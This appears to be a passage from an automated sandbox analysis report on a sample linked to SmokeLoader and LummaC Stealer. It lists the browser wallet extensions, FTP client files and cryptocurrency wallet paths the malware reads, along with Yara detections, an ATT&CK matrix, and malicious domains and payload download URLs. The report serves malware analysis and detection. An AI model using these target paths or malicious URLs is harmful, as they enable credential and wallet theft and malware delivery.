Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY

Source: Yara match	File source: 00000014.00000003.2719411420.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2718324316.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2763564207.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2707939700.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2721074628.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2711751965.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2709067186.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2748207856.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2722685463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2773942055.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2710272272.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2775761675.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2775010312.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2718700898.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2732789726.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2727794367.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2745784061.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2719069820.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2728924066.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2750455743.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2723831402.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2754315012.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2771030562.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2730614080.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2639948784.0000000003385000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2722975569.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2722293127.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2725597045.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2710789516.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2731443501.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2727021426.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2739250905.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2752660197.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2723350462.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2717828329.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2729723839.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2742008984.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2724319284.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2719837852.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2758698968.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2641040146.000000000339A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2712752600.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2708630118.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2720461285.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2723578701.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2776713870.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2709425856.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2755765859.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2728281717.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2782316881.0000000000560000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2721584393.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2734445019.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2709861506.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 1988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lm.exe PID: 5724, type: MEMORYSTR

Remote Access Functionality

Yara detected Go Injector

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 9.2.EF14.exe.7ff71bc40000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.EF14.exe.7ff71bc40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2570610433.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2414575122.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EF14.exe PID: 3868, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\EF14.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 1988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lm.exe PID: 5724, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8D9E10 bind,listen,WSAGetLastError,closesocket,		19_2_6C8D9E10
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C869E10 bind,listen,WSAGetLastError,closesocket,		20_2_6C869E10

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	112 Scripting	Valid Accounts	331 Windows Management Instrumentation	112 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	121 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	1 Input Capture	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	13 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	2 Scheduled Task/Job	812 Process Injection	241 Obfuscated Files or Information	Security Account Manager	237 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 Command and Scripting Interpreter	121 Registry Run Keys / Startup Folder	2 Scheduled Task/Job	12 Software Packing	NTDS	1081 Security Software Discovery	Distributed Component Object Model	1 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 Scheduled Task/Job	Network Logon Script	121 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	2 Clipboard Data	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	4 PowerShell	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	471 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	125 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	471 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	812 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	58%	Virustotal		Browse
e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	100%	Avira	TR/Crypt.XPACK.Gen
e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\adjijwj	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\8EC7.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\adjijwj	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2D42.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\8EC7.exe	71%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\EF14.exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll	42%	ReversingLabs	Win32.Adware.RedCap
C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll	42%	ReversingLabs	Win32.Adware.RedCap
C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
funrecipebooks.com	1%	Virustotal	Browse
store4.gofile.io	0%	Virustotal	Browse
rentry.co	1%	Virustotal	Browse
mzxn.ru	2%	Virustotal	Browse
liernessfornicsa.shop	19%	Virustotal	Browse
mussangroup.com	14%	Virustotal	Browse
callosallsaospz.shop	19%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://aka.ms/odirmr	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	0%	URL Reputation	safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	URL Reputation	safe
https://aka.ms/winsvr-2022-pshelp	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
http://schemas.micr	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	URL Reputation	safe
http://100xmargin.com/tmp/index.php	0%	Avira URL Cloud	safe
https://liernessfornicsa.shop/)	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://olinsw.ws/tmp/index.php	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	URL Reputation	safe
https://www.rd.com/list/polite-habits-campers-dislike/	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	URL Reputation	safe
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	0%	URL Reputation	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://callosallsaospz.shop/ly3$	100%	Avira URL Cloud	malware
https://callosallsaospz.shop/apiple-sto:s	100%	Avira URL Cloud	malware
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://olinsw.ws/tmp/index.php	0%	Virustotal		Browse
https://liernessfornicsa.shop/E	0%	Avira URL Cloud	safe
https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip	0%	Avira URL Cloud	safe
